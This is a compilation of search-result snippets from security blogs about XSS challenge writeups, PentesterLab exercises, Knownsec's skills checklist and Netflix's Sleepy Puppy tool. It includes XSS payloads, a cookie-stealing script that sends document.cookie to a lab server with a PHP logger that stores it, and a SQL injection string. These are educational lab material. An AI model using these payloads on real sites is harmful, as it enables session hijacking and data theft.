old.blog.lightrains.org
标签 writeup 下的文章 - 西风微雨的旧博客
https://old.blog.lightrains.org/tag/writeup
挑战地址 http:/ xss-quiz.int21h.jp. 初始环境 firefox and IE,由于chrome的XSS filter,chrome下并不能通过测试. Stage #1 Hint: very simple. Script alert(document.domain); /script / first script alert(document.domain); /script / second img onerror=alert(document.domain); src=1 / third. Stage #2 Hint: close the current tag and add SCRIPT tag. Script alert(document.domain); /script. Stage #3 Hint: The input in text box is properly escaped. Stage #4 Hint: invisible input field. Script alert(document.domain); /script. 共 1,229 人围观.
blog.knownsec.com
知道创宇研发技能表v2.2 2014/3/9 发布 by @知道创宇(www.knownsec.com) @余弦 & 行之 知道创宇是国内Geek十足且普遍被认为特别有前途的互联网安全公司, 动态请关注微信公众号:Lazy-Thought。
http://blog.knownsec.com/Knownsec_RD_Checklist/v2.2.html
By @知道创宇(www.knownsec.com) @余弦 and 行之. Http:/ www.wapm.cn/smart-questions/smart-questions-zh.html. 不要一味盲目追求 高级感 ,而忽视 小事 / 简单事 / 基础事. 好的 方法论 会让你具备更强的 创造力. 编辑urllib2的do open里的h.set debuglevel. Php header("Location: 3.php");? Php header("HTTP/1.1 301 Moved Permanently"); header("Location: 2.php");? Meta http-equiv="refresh" content="0; url=http:/ www.evilcos.me" /. Location.href="http:/ evilcos.me";. 正则 弱 ,js引擎 王道. 实战至少3回合 http:/ coolshell.cn/articles/5426.html. Http:/ www.regexper.com/. GitHub https:/ gith...
old.blog.lightrains.org
西风微雨的旧博客
https://old.blog.lightrains.org/page/1
Coding Exploits Curious Sharing. 享受coding带来的快乐,不会编程的hacker不是好hacker,Talk is cheap. 漏洞是具有灵魂的,回归漏洞本质,不断的Bypass,安全是一门平衡的艺术. Keep stupid,永远保持好奇心,这是人生态度,也是一个安全从业者的人生准则. PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Name=hacker script alert(1) /script.
masatokinugawa.l0.cm
Masato Kinugawa Security Blog: 2月 2015
http://masatokinugawa.l0.cm/2015_02_01_archive.html
Masato Kinugawa Security Blog. Cure53 XSSMas Challenge '14 Writeup. 12月と言えばXSS-Masの季節ということで、最近は、XSS-Mas前から1月の終わりまで開催されていた、賞金付きXSSチャレンジ「Cure53 XSS-Mas Challenge 2014」に挑戦していました。 Cure53 XSS-Mas Challenge 2014. XSSチャレンジというのは、出題者がわざとわかりにくい形でXSSに脆弱にしたページ(例:特定の記号や文字が使えない、文字数制限がある等)で、指定した条件(alert関数 で「1」の文字をだすとか)をクリアして、スクリプトが実行できることを証明するという、XSSを嗜む人たちの間で楽しまれる一種のパズルゲームです。 実際にXSSで攻撃可能なことを証明しないといけない場面でも、特定の制約がかかることは多く、こういったチャレンジは単なるパズル遊びというだけでなく、攻撃の発想を養ううえでとても有益なものです。 XSS Challenges (by yamagata21). 制御文字が含まれていてうまくコピー...
techblog.netflix.com
The Netflix Tech Blog: August 2015
http://techblog.netflix.com/2015_08_01_archive.html
Monday, August 31, 2015. Announcing Sleepy Puppy - Cross-Site Scripting Payload Management for Web Application Security Testing. Netflix is pleased to announce the open source release of our cross-site scripting (XSS) payload management framework: Sleepy Puppy! The Challenge of Cross-Site Scripting. Is a type of web application security vulnerability that allows an attacker to execute arbitrary client-side script in a victim’s browser. XSS has been listed on the OWASP Top 10. Is a variant of stored XSS t...
old.blog.lightrains.org
标签 xss 下的文章 - 西风微雨的旧博客
https://old.blog.lightrains.org/tag/xss
Prompt(1) to win payload. 共 1,034 人围观. Function escape(input) { / warm up / script should be executed without user interaction return ' input type=text value=' input ' '; }. X img src=1 onerror=prompt(1) / first svg/onload=prompt(1) / second. Function escape(input) { / tags stripping mechanism from ExtJS library / Ext.util.Format.stripTags var stripTagsRE = / /? Gi; input = input.replace(stripTagsRE, ' ); return ' article ' input ' /article '; }. Svg script prompt(1) /script. Stage #1 Hint: very simple.
arpida.com
知道创宇研发技能表v3.1 2016/5/18 发布 by @知道创宇(www.knownsec.com) @余弦 & 404团队 后续动态请关注微信公众号:Lazy-Thought
http://www.arpida.com/learn
By @知道创宇(www.knownsec.com) @余弦 and 404团队. 好的 方法论 会让你具备更强的 创造力. 举个小例子 一个10人团队约定早上10点开会,而你迟到了10分钟,对于团队来说你浪费了整个团队100分钟 10人*10分钟 的生命。 不要一味盲目追求 高级感 ,而忽视 小事 / 简单事 / 基础事. 编辑urllib2的do open里的h.set debuglevel. Php header("Location: 3.php");? Php header("HTTP/1.1 301 Moved Permanently"); header("Location: 2.php");? Meta http-equiv="refresh" content="0; url=http:/ www.evilcos.me" /. Location.href="http:/" "/evilcos.me";. 实战至少3回合 http:/ coolshell.cn/articles/5426.html. Http:/ www.regexper.com/. 答案 xss quiz.txt.
old.blog.lightrains.org
分类 网络安全 下的文章 - 西风微雨的旧博客
https://old.blog.lightrains.org/category/security
PentesterLab]XSS and MySQL FILE. Script document.write(' img src=http:/ 192.168.56.101/xss.php? Cookie=' document.cookie ' / '); /script. 192168.56.101为任意在同一网段的server,我这里为了简便就直接用的被攻击的服务器IP. Php $coo=$ GET['cookie']; $fp=fopen('cook.txt','a'); fwrite($fp,$coo); fclose($fp);? PentesterLab]web for pentester I. Http:/ 192.168.56.101/sqli/example1.php? Name=root' union select user(),version(),@ basedir,4,5%23. 过滤空格,换行符%0a绕过, 0b也可以,http:/ 192.168.56.101/sqli/example2.php? Name=hacker script alert(1) /script.